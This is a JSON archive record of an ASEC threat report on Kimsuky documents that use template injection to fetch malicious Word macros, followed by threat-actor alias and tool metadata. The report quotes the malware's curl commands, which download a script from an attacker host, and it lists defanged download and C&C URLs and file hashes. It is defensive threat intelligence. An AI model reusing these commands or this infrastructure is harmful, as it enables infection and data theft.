{
	"id": "9109ee3a-83d3-4731-b0bf-9a7a94c71cab",
	"created_at": "2026-04-06T00:08:21.169334Z",
	"updated_at": "2026-04-10T03:37:41.140248Z",
	"deleted_at": null,
	"sha1_hash": "f40864fa3082851351ddf5e46cbd7f93c212305e",
	"title": "Malware Disguised as Normal Documents (Kimsuky) - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2435741,
	"plain_text": "Malware Disguised as Normal Documents (Kimsuky) - ASEC\r\nBy ATCP\r\nPublished: 2023-02-02 · Archived: 2026-04-05 18:38:29 UTC\r\nThe ASEC analysis team has recently discovered that the malware introduced in the post, \u003cMalware Disguised as\r\na Manuscript Solicitation Letter (Targeting Security-Related Workers)\u003e, is being distributed to broadcasting\r\nand ordinary companies as well as those in the security-related field. Identical to the malware introduced in the\r\nblog post above, all the malware documents utilize the template injection technique and download malicious word\r\nmacro documents to execute themselves. The distributed filenames are as follows:\r\n[kbs Sunday Diagnosis] Questionnaire.docx\r\nIm ** Cover Letter.docx\r\napp-planning – copy.docx\r\nhttps://asec.ahnlab.com/en/47585/\r\nPage 1 of 5\n\nTo facilitate the execution of the malicious macro code, the threat actor used an image that prompts users to\r\nexecute the macro. The image has been constantly used since the past and is suspected to be all from the same\r\noperator.\r\nBelow is a list of download URLS of malicious Word macro documents we have additionally identified.\r\nhxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload2/init.dotm\r\nhxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload3/init.dotm\r\nhxxp://jooshineng[.]com/gnuboard4/adm/img/ghp/up/state.dotm\r\nhxxp://gdtech[.]kr/gnuboard4/adm/cmg/attatch/init.dotm\r\nhxxp://ddim.co[.]kr/gnuboard4/adm/cmg/upload/init.dotm\r\nWhen the malicious macro inside the downloaded document is executed, it generates and runs the version.bat file\r\nthat contains the curl command. The batch file includes codes that download and execute a normal document and\r\nadditional malicious script. The used curl commands are as follows.\r\ncurl -o “”” \u0026 fname \u0026 “”” hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/state.docx\r\ncurl -o %temp%\\temp.vbs hxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/list.php?query=60\r\nConfirmed normal documents disguised themselves cover letters, application proposals, and more.\r\nhttps://asec.ahnlab.com/en/47585/\r\nPage 2 of 5\n\nhttps://asec.ahnlab.com/en/47585/\r\nPage 3 of 5\n\nIdentical to the previous findings, the additional malicious script leaks the following data to the C\u0026C server.\r\nInfected PC system information\r\nInformation on virus vaccines installed on the system\r\nList of recently opened Word files\r\nDirectory information of the download folder in the system\r\nInformation of running processes\r\nModification of IE-related registries\r\nRegistration to the task scheduler to maintain a connection to the C\u0026C server\r\nThe confirmed C\u0026C URLs are as follows.\r\nhxxp://gdtech[.]kr/gnuboard4/adm/cmg/upload/show.php\r\nhxxp://ddim.co[.]kr/gnuboard4/adm/cmg/upload/show.php\r\nhxxp://www.hydrotec.co[.]kr/bbs/img/cmg/upload3/show.php\r\nRecently, malware cases targeting North Korea-related individuals are also being distributed to ordinary corporate\r\nusers, calling for their utmost precaution. Users must therefore refrain from viewing emails from unknown senders\r\nand take caution so that macros included in Office documents do not run automatically.\r\n[File Detection]\r\nDownloader/DOC.External (2023.02.03.03)\r\nDownloader/DOC.Kimsuky (2023.02.07.00)\r\nMD5\r\n3cdf9f829ed03e1ac17b72b636d84d0b\r\nhttps://asec.ahnlab.com/en/47585/\r\nPage 4 of 5\n\n55a46a2415d18093abcd59a0bf33d0a9\r\n705ef00224f3f7b02e29f21eb6e10d02\r\n83b4d96fc75f74bb589c28e8a9eddbbf\r\n873b2b0656ee9f6912390b5abc32b276\r\nAdditional IOCs are available on AhnLab TIP.\r\nURL\r\nhttp[:]//ddim[.]co[.]kr/gnuboard4/adm/cmg/upload/init[.]dotm\r\nhttp[:]//gdtech[.]kr/gnuboard4/adm/cmg/attatch/init[.]dotm\r\nhttp[:]//gdtech[.]kr/gnuboard4/adm/cmg/upload/list[.]php?query=60\r\nhttp[:]//www[.]hydrotec[.]co[.]kr/bbs/img/cmg/upload2/init[.]dotm\r\nhttp[:]//www[.]hydrotec[.]co[.]kr/bbs/img/cmg/upload3/init[.]dotm\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click\r\nthe banner below.\r\nSource: https://asec.ahnlab.com/en/47585/\r\nhttps://asec.ahnlab.com/en/47585/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://asec.ahnlab.com/en/47585/"
	],
	"report_names": [
		"47585"
	],
	"threat_actors": [
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434101,
	"ts_updated_at": 1775792261,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f40864fa3082851351ddf5e46cbd7f93c212305e.pdf",
		"text": "https://archive.orkl.eu/f40864fa3082851351ddf5e46cbd7f93c212305e.txt",
		"img": "https://archive.orkl.eu/f40864fa3082851351ddf5e46cbd7f93c212305e.jpg"
	}
}